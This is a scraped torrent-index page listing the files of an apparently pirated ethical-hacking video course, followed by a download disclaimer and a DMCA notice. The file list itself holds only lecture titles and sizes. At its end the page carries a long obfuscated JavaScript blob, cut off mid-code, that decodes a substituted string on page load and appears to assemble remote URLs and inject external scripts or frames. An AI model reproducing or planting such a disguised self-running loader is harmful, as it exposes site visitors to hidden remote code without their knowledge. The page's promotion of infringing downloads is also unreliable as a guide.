    14 Security Policies/149 Introduction to threat modelling and classification.en.srt 5.66 KB
    14 Security Policies/149 Introduction to threat modelling and classification.it.srt 6.17 KB
    14 Security Policies/149 Introduction to threat modelling and classification.mp4 13.3 MB
    14 Security Policies/150 Threat modelling - STRIDE.en.srt 4.14 KB
    14 Security Policies/150 Threat modelling - STRIDE.it.srt 4.38 KB
    14 Security Policies/150 Threat modelling - STRIDE.mp4 10.58 MB
    14 Security Policies/151 STRIDE Spoofing identity.en.srt 5.53 KB
    14 Security Policies/151 STRIDE Spoofing identity.it.srt 5.95 KB
    14 Security Policies/151 STRIDE Spoofing identity.mp4 13.84 MB
    14 Security Policies/152 STRIDE Tampering with Data.en.srt 4.98 KB
    14 Security Policies/152 STRIDE Tampering with Data.it.srt 5.4 KB
    14 Security Policies/152 STRIDE Tampering with Data.mp4 12.84 MB
    14 Security Policies/153 STRIDE Denial of Service.en.srt 4.24 KB
    14 Security Policies/153 STRIDE Denial of Service.it.srt 4.67 KB
    14 Security Policies/153 STRIDE Denial of Service.mp4 10.39 MB
    15 Risk Management/154 Introduction to Risk Management.en.srt 1.63 KB
    15 Risk Management/154 Introduction to Risk Management.it.srt 1.71 KB
    15 Risk Management/154 Introduction to Risk Management.mp4 3.87 MB
    15 Risk Management/155 Attack methods.en.srt 7.53 KB
    15 Risk Management/155 Attack methods.it.srt 8.12 KB
    15 Risk Management/155 Attack methods.mp4 17.28 MB
    15 Risk Management/156 Local attacks.en.srt 3.3 KB
    15 Risk Management/156 Local attacks.it.srt 3.7 KB
    15 Risk Management/156 Local attacks.mp4 7.88 MB
    15 Risk Management/157 Target scanning and enumeration techniques 1.en.srt 6.26 KB
    15 Risk Management/157 Target scanning and enumeration techniques 1.it.srt 6.64 KB
    15 Risk Management/157 Target scanning and enumeration techniques 1.mp4 15.84 MB
    15 Risk Management/158 Target scanning and enumeration techniques 2.en.srt 3.68 KB
    15 Risk Management/158 Target scanning and enumeration techniques 2.it.srt 3.93 KB
    15 Risk Management/158 Target scanning and enumeration techniques 2.mp4 8.4 MB
    15 Risk Management/159 Passive scanning.en.srt 2.08 KB
    15 Risk Management/159 Passive scanning.it.srt 2.24 KB
    15 Risk Management/159 Passive scanning.mp4 7.13 MB
    15 Risk Management/160 03-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.61 MB
    15 Risk Management/160 Attack Methodologies - notes for the examination.html 899 B
    15 Risk Management/161 Introduction to risk assessment.en.srt 7.05 KB
    15 Risk Management/161 Introduction to risk assessment.it.srt 7.58 KB
    15 Risk Management/161 Introduction to risk assessment.mp4 18.15 MB
    15 Risk Management/162 DREAD Risk assessment model.en.srt 5.16 KB
    15 Risk Management/162 DREAD Risk assessment model.it.srt 5.49 KB
    15 Risk Management/162 DREAD Risk assessment model.mp4 12.64 MB
    15 Risk Management/163 DREAD Exploitability.en.srt 5.93 KB
    15 Risk Management/163 DREAD Exploitability.it.srt 6.33 KB
    15 Risk Management/163 DREAD Exploitability.mp4 13.9 MB
    15 Risk Management/164 EXERCISE Risk Assessment.en.srt 8.11 KB
    15 Risk Management/164 EXERCISE Risk Assessment.it.srt 8.63 KB
    15 Risk Management/164 EXERCISE Risk Assessment.mp4 18.11 MB
    15 Risk Management/165 03-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.81 MB
    15 Risk Management/165 Risk Assessment - notes for the examination.html 894 B
    15 Risk Management/166 Introduction to Social Engineering and rogue software.en.srt 4.69 KB
    15 Risk Management/166 Introduction to Social Engineering and rogue software.it.srt 5.01 KB
    15 Risk Management/166 Introduction to Social Engineering and rogue software.mp4 11.41 MB
    15 Risk Management/167 Manipulation tactics.en.srt 10.42 KB
    15 Risk Management/167 Manipulation tactics.it.srt 10.85 KB
    15 Risk Management/167 Manipulation tactics.mp4 22.17 MB
    15 Risk Management/168 EXERCISE Social Engineering attacks.en.srt 6.83 KB
    15 Risk Management/168 EXERCISE Social Engineering attacks.it.srt 7.27 KB
    15 Risk Management/168 EXERCISE Social Engineering attacks.mp4 19.02 MB
    15 Risk Management/169 SE with KALI BackTrack.en.srt 7.34 KB
    15 Risk Management/169 SE with KALI BackTrack.it.srt 7.73 KB
    15 Risk Management/169 SE with KALI BackTrack.mp4 16.16 MB
    15 Risk Management/170 Rogue Software.en.srt 2.7 KB
    15 Risk Management/170 Rogue Software.it.srt 2.84 KB
    15 Risk Management/170 Rogue Software.mp4 7.37 MB
    15 Risk Management/171 Fraud tools 1.en.srt 7.32 KB
    15 Risk Management/171 Fraud tools 1.it.srt 7.94 KB
    15 Risk Management/171 Fraud tools 1.mp4 20.02 MB
    15 Risk Management/172 Fraud tools 2.en.srt 7.15 KB
    15 Risk Management/172 Fraud tools 2.it.srt 7.68 KB
    15 Risk Management/172 Fraud tools 2.mp4 17.72 MB
    15 Risk Management/173 03-3-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.9 MB
    15 Risk Management/173 Social Engineering and Rogue Software - notes for the examination.html 916 B
    16 Defence in Depth/174 Introduction to Defence in Depth.en.srt 1.63 KB
    16 Defence in Depth/174 Introduction to Defence in Depth.it.srt 1.79 KB
    16 Defence in Depth/174 Introduction to Defence in Depth.mp4 4.54 MB
    16 Defence in Depth/175 How to use Defence in Depth model.en.srt 6.11 KB
    16 Defence in Depth/175 How to use Defence in Depth model.it.srt 6.58 KB
    16 Defence in Depth/175 How to use Defence in Depth model.mp4 14.67 MB
    16 Defence in Depth/176 DiD OS and LAN Layers.en.srt 7.08 KB
    16 Defence in Depth/176 DiD OS and LAN Layers.it.srt 7.53 KB
    16 Defence in Depth/176 DiD OS and LAN Layers.mp4 16.13 MB
    16 Defence in Depth/177 DiD Perimeter and Physical Access Layers.en.srt 6.19 KB
    16 Defence in Depth/177 DiD Perimeter and Physical Access Layers.it.srt 6.59 KB
    16 Defence in Depth/177 DiD Perimeter and Physical Access Layers.mp4 12.92 MB
    16 Defence in Depth/178 DiD Demonstration.en.srt 2.84 KB
    16 Defence in Depth/178 DiD Demonstration.it.srt 3.08 KB
    16 Defence in Depth/178 DiD Demonstration.mp4 6.98 MB
    16 Defence in Depth/179 Automated attack targeting a service.en.srt 5.26 KB
    16 Defence in Depth/179 Automated attack targeting a service.it.srt 5.63 KB
    16 Defence in Depth/179 Automated attack targeting a service.mp4 15.14 MB
    16 Defence in Depth/180 Automated user-targeting attack.en.srt 4.99 KB
    16 Defence in Depth/180 Automated user-targeting attack.it.srt 5.31 KB
    16 Defence in Depth/180 Automated user-targeting attack.mp4 13.43 MB
    16 Defence in Depth/181 04-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.64 MB
    16 Defence in Depth/181 The Defence in Depth Model - notes for the examination.html 905 B
    16 Defence in Depth/182 Introduction to Immutable laws of security - Law 1.en.srt 5.13 KB
    16 Defence in Depth/182 Introduction to Immutable laws of security - Law 1.it.srt 5.38 KB
    16 Defence in Depth/182 Introduction to Immutable laws of security - Law 1.mp4 13.99 MB
    16 Defence in Depth/183 Law 2.en.srt 3.18 KB
    16 Defence in Depth/183 Law 2.it.srt 3.51 KB
    16 Defence in Depth/183 Law 2.mp4 7.58 MB
    16 Defence in Depth/184 Law 3.en.srt 2.48 KB
    16 Defence in Depth/184 Law 3.it.srt 2.62 KB
    16 Defence in Depth/184 Law 3.mp4 5.86 MB
    16 Defence in Depth/185 Law 4.en.srt 1.99 KB
    16 Defence in Depth/185 Law 4.it.srt 2.15 KB
    16 Defence in Depth/185 Law 4.mp4 5.96 MB
    16 Defence in Depth/186 Law 5.en.srt 3.52 KB
    16 Defence in Depth/186 Law 5.it.srt 3.8 KB
    16 Defence in Depth/186 Law 5.mp4 8.81 MB
    16 Defence in Depth/187 Law 6.en.srt 2.4 KB
    16 Defence in Depth/187 Law 6.it.srt 2.66 KB
    16 Defence in Depth/187 Law 6.mp4 5.82 MB
    16 Defence in Depth/188 Law 7.en.srt 1.36 KB
    16 Defence in Depth/188 Law 7.it.srt 1.49 KB
    16 Defence in Depth/188 Law 7.mp4 2.9 MB
    16 Defence in Depth/189 Law 8.en.srt 1.71 KB
    16 Defence in Depth/189 Law 8.it.srt 1.8 KB
    16 Defence in Depth/189 Law 8.mp4 4.59 MB
    16 Defence in Depth/190 Law 9.en.srt 4.6 KB
    16 Defence in Depth/190 Law 9.it.srt 4.79 KB
    16 Defence in Depth/190 Law 9.mp4 9.23 MB
    16 Defence in Depth/191 Law 10.en.srt 791 B
    16 Defence in Depth/191 Law 10.it.srt 865 B
    16 Defence in Depth/191 Law 10.mp4 1.96 MB
    16 Defence in Depth/192 Laws for administrators.en.srt 6.71 KB
    16 Defence in Depth/192 Laws for administrators.it.srt 7.18 KB
    16 Defence in Depth/192 Laws for administrators.mp4 13.86 MB
    16 Defence in Depth/193 04-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.62 MB
    16 Defence in Depth/193 Immutable Laws of Security - notes for the examination.html 905 B
    17 Disaster Recovery/194 Introduction to Disaster Recovery.en.srt 1.67 KB
    17 Disaster Recovery/194 Introduction to Disaster Recovery.it.srt 1.81 KB
    17 Disaster Recovery/194 Introduction to Disaster Recovery.mp4 4.36 MB
    17 Disaster Recovery/195 How to reduce losses.en.srt 5.95 KB
    17 Disaster Recovery/195 How to reduce losses.it.srt 6.39 KB
    17 Disaster Recovery/195 How to reduce losses.mp4 14.85 MB
    17 Disaster Recovery/196 Ensuring continous availability.en.srt 4.36 KB
    17 Disaster Recovery/196 Ensuring continous availability.it.srt 4.67 KB
    17 Disaster Recovery/196 Ensuring continous availability.mp4 10.78 MB
    17 Disaster Recovery/197 Threat discovery 1.en.srt 4.54 KB
    17 Disaster Recovery/197 Threat discovery 1.it.srt 5.2 KB
    17 Disaster Recovery/197 Threat discovery 1.mp4 12.28 MB
    17 Disaster Recovery/198 Threat discovery 2.en.srt 3.93 KB
    17 Disaster Recovery/198 Threat discovery 2.it.srt 4.31 KB
    17 Disaster Recovery/198 Threat discovery 2.mp4 8.84 MB
    17 Disaster Recovery/199 Audit users and keep control accounts.en.srt 5.17 KB
    17 Disaster Recovery/199 Audit users and keep control accounts.it.srt 5.69 KB
    17 Disaster Recovery/199 Audit users and keep control accounts.mp4 13.3 MB
    17 Disaster Recovery/200 High risk users.en.srt 3.64 KB
    17 Disaster Recovery/200 High risk users.it.srt 4.04 KB
    17 Disaster Recovery/200 High risk users.mp4 7.92 MB
    17 Disaster Recovery/201 Collecting and analysing evidence.en.srt 6.91 KB
    17 Disaster Recovery/201 Collecting and analysing evidence.it.srt 7.41 KB
    17 Disaster Recovery/201 Collecting and analysing evidence.mp4 18.29 MB
    17 Disaster Recovery/202 Forensics example.en.srt 4.05 KB
    17 Disaster Recovery/202 Forensics example.it.srt 4.32 KB
    17 Disaster Recovery/202 Forensics example.mp4 10.61 MB
    17 Disaster Recovery/203 CONFICKER CASE STUDY.en.srt 7.8 KB
    17 Disaster Recovery/203 CONFICKER CASE STUDY.it.srt 8.51 KB
    17 Disaster Recovery/203 CONFICKER CASE STUDY.mp4 20.02 MB
    17 Disaster Recovery/204 05-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.44 MB
    17 Disaster Recovery/204 How to reduce losses - notes for the examination.html 899 B
    18 Application Security - Configuration and Management/205 Heres what youll learn in this module.en.srt 1.15 KB
    18 Application Security - Configuration and Management/205 Heres what youll learn in this module.it.srt 1.29 KB
    18 Application Security - Configuration and Management/205 Heres what youll learn in this module.mp4 3.1 MB
    18 Application Security - Configuration and Management/206 Managing applications.en.srt 10.22 KB
    18 Application Security - Configuration and Management/206 Managing applications.it.srt 11.17 KB
    18 Application Security - Configuration and Management/206 Managing applications.mp4 17.21 MB
    18 Application Security - Configuration and Management/207 Software updates.en.srt 3.16 KB
    18 Application Security - Configuration and Management/207 Software updates.it.srt 3.34 KB
    18 Application Security - Configuration and Management/207 Software updates.mp4 6.22 MB
    18 Application Security - Configuration and Management/208 MS Update.en.srt 7.51 KB
    18 Application Security - Configuration and Management/208 MS Update.it.srt 8.14 KB
    18 Application Security - Configuration and Management/208 MS Update.mp4 16.24 MB
    18 Application Security - Configuration and Management/209 System Center Configuration Manager.en.srt 3.17 KB
    18 Application Security - Configuration and Management/209 System Center Configuration Manager.it.srt 3.34 KB
    18 Application Security - Configuration and Management/209 System Center Configuration Manager.mp4 6.27 MB
    18 Application Security - Configuration and Management/210 Blocking applications.en.srt 8.7 KB
    18 Application Security - Configuration and Management/210 Blocking applications.it.srt 9.54 KB
    18 Application Security - Configuration and Management/210 Blocking applications.mp4 17.98 MB
    18 Application Security - Configuration and Management/211 Software restrictions policies.en.srt 6.76 KB
    18 Application Security - Configuration and Management/211 Software restrictions policies.it.srt 7.56 KB
    18 Application Security - Configuration and Management/211 Software restrictions policies.mp4 14.49 MB
    18 Application Security - Configuration and Management/212 EXERCISE Application control rules.en.srt 13.4 KB
    18 Application Security - Configuration and Management/212 EXERCISE Application control rules.it.srt 14.88 KB
    18 Application Security - Configuration and Management/212 EXERCISE Application control rules.mp4 27.19 MB
    18 Application Security - Configuration and Management/213 Isolating applications.en.srt 7.16 KB
    18 Application Security - Configuration and Management/213 Isolating applications.it.srt 7.85 KB
    18 Application Security - Configuration and Management/213 Isolating applications.mp4 16.88 MB
    18 Application Security - Configuration and Management/214 14-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.61 MB
    18 Application Security - Configuration and Management/214 How to protect users without interrupting their work - notes for the examination.html 931 B
    19 Cryptography/215 Introduction to cryptography.en.srt 11.32 KB
    19 Cryptography/215 Introduction to cryptography.it.srt 12.42 KB
    19 Cryptography/215 Introduction to cryptography.mp4 23.58 MB
    19 Cryptography/216 History of ciphers.en.srt 12.21 KB
    19 Cryptography/216 History of ciphers.it.srt 13.13 KB
    19 Cryptography/216 History of ciphers.mp4 25.5 MB
    19 Cryptography/217 Symmetric and asymmetric ciphers.en.srt 6.74 KB
    19 Cryptography/217 Symmetric and asymmetric ciphers.it.srt 7.08 KB
    19 Cryptography/217 Symmetric and asymmetric ciphers.mp4 15.06 MB
    19 Cryptography/218 Symmetric-key algorithms.en.srt 6.06 KB
    19 Cryptography/218 Symmetric-key algorithms.it.srt 6.66 KB
    19 Cryptography/218 Symmetric-key algorithms.mp4 13.51 MB
    19 Cryptography/219 Block ciphers.en.srt 6.43 KB
    19 Cryptography/219 Block ciphers.it.srt 6.92 KB
    19 Cryptography/219 Block ciphers.mp4 15.35 MB
    19 Cryptography/220 Data encryption standard.en.srt 7.16 KB
    19 Cryptography/220 Data encryption standard.it.srt 7.7 KB
    19 Cryptography/220 Data encryption standard.mp4 16.54 MB
    19 Cryptography/221 DES-X.en.srt 7.65 KB
    19 Cryptography/221 DES-X.it.srt 8.33 KB
    19 Cryptography/221 DES-X.mp4 18.22 MB
    19 Cryptography/222 Advanced encryption standards.en.srt 5.47 KB
    19 Cryptography/222 Advanced encryption standards.it.srt 5.79 KB
    19 Cryptography/222 Advanced encryption standards.mp4 12.83 MB
    19 Cryptography/223 Block cipher modes.en.srt 7.72 KB
    19 Cryptography/223 Block cipher modes.it.srt 8.35 KB
    19 Cryptography/223 Block cipher modes.mp4 17.49 MB
    19 Cryptography/224 Stream Ciphers - RC4.en.srt 3.88 KB
    19 Cryptography/224 Stream Ciphers - RC4.it.srt 4.14 KB
    19 Cryptography/224 Stream Ciphers - RC4.mp4 8.59 MB
    19 Cryptography/225 Asymmetric-key algorithms.en.srt 8.51 KB
    19 Cryptography/225 Asymmetric-key algorithms.it.srt 9.17 KB
    19 Cryptography/225 Asymmetric-key algorithms.mp4 19.08 MB
    19 Cryptography/226 RSA.en.srt 5.68 KB
    19 Cryptography/226 RSA.it.srt 6.03 KB
    19 Cryptography/226 RSA.mp4 12.83 MB
    19 Cryptography/227 ELGAMAL.en.srt 2.16 KB
    19 Cryptography/227 ELGAMAL.it.srt 2.33 KB
    19 Cryptography/227 ELGAMAL.mp4 4.9 MB
    19 Cryptography/228 HASH functions.en.srt 6.04 KB
    19 Cryptography/228 HASH functions.it.srt 6.31 KB
    19 Cryptography/228 HASH functions.mp4 14.43 MB
    19 Cryptography/229 Digital signature.en.srt 6.67 KB
    19 Cryptography/229 Digital signature.it.srt 7.21 KB
    19 Cryptography/229 Digital signature.mp4 15.45 MB
    19 Cryptography/230 Hybrid Schemes.en.srt 7 KB
    19 Cryptography/230 Hybrid Schemes.it.srt 7.55 KB
    19 Cryptography/230 Hybrid Schemes.mp4 16.06 MB
    19 Cryptography/231 15-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.51 MB
    19 Cryptography/231 Symmetric and Asymmetric Ciphers - notes for the examination.html 911 B
    20 Public Key Infrastructure/232 Introduction to cryptology.en.srt 2.66 KB
    20 Public Key Infrastructure/232 Introduction to cryptology.it.srt 2.83 KB
    20 Public Key Infrastructure/232 Introduction to cryptology.mp4 5.98 MB
    20 Public Key Infrastructure/233 Public key infrastructure.en.srt 7.28 KB
    20 Public Key Infrastructure/233 Public key infrastructure.it.srt 7.72 KB
    20 Public Key Infrastructure/233 Public key infrastructure.mp4 14.8 MB
    20 Public Key Infrastructure/234 Implementing public key infrastructure.en.srt 6.41 KB
    20 Public Key Infrastructure/234 Implementing public key infrastructure.it.srt 6.97 KB
    20 Public Key Infrastructure/234 Implementing public key infrastructure.mp4 12.74 MB
    20 Public Key Infrastructure/235 What will PKI allow you.en.srt 7.5 KB
    20 Public Key Infrastructure/235 What will PKI allow you.it.srt 8.12 KB
    20 Public Key Infrastructure/235 What will PKI allow you.mp4 14.46 MB
    20 Public Key Infrastructure/236 EXERCISE Certificates.en.srt 10.12 KB
    20 Public Key Infrastructure/236 EXERCISE Certificates.it.srt 10.7 KB
    20 Public Key Infrastructure/236 EXERCISE Certificates.mp4 20.63 MB
    20 Public Key Infrastructure/237 Planning the PKI.en.srt 10.28 KB
    20 Public Key Infrastructure/237 Planning the PKI.it.srt 10.8 KB
    20 Public Key Infrastructure/237 Planning the PKI.mp4 22.55 MB
    20 Public Key Infrastructure/238 Certificate life cycle.en.srt 7.18 KB
    20 Public Key Infrastructure/238 Certificate life cycle.it.srt 7.65 KB
    20 Public Key Infrastructure/238 Certificate life cycle.mp4 16.19 MB
    20 Public Key Infrastructure/239 PKI Administration.en.srt 8.47 KB
    20 Public Key Infrastructure/239 PKI Administration.it.srt 9.06 KB
    20 Public Key Infrastructure/239 PKI Administration.mp4 19.69 MB
    20 Public Key Infrastructure/240 02-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.42 MB
    20 Public Key Infrastructure/240 Threat Modelling and Classification - notes for the examination.html 914 B
    20 Public Key Infrastructure/241 16-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.18 MB
    20 Public Key Infrastructure/241 Public Key Infrastructure - Trust but verify - notes for the examination.html 923 B
    22 Certificate/242 Certificate-Itsec.pdf 482.37 KB
    23 Rootkits and Stealth Apps Creating and Revealing v2.0 (course preview)/243 Wiriting a Shellcode.en.srt 16.44 KB
    23 Rootkits and Stealth Apps Creating and Revealing v2.0 (course preview)/243 Wiriting a Shellcode.it.srt 17.65 KB
    23 Rootkits and Stealth Apps Creating and Revealing v2.0 (course preview)/243 Wiriting a Shellcode.mp4 179.9 MB
    24 BONUS Section/244 Secacademy-Voucher.pdf 93.4 KB
    24 BONUS Section/245 BONUS LECTURE Learn more and get to know our other courses.html 5.3 KB
    24 BONUS Section/246 Thank you.html 1.2 KB
    Read Me.txt 1.02 KB
    [FreeAllCourse.Com].url 52 B

Download Info

  • Tips

    “[FreeAllCourse.Com] Udemy - Hacking in Practice Certified Ethical Hacking MEGA Course” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 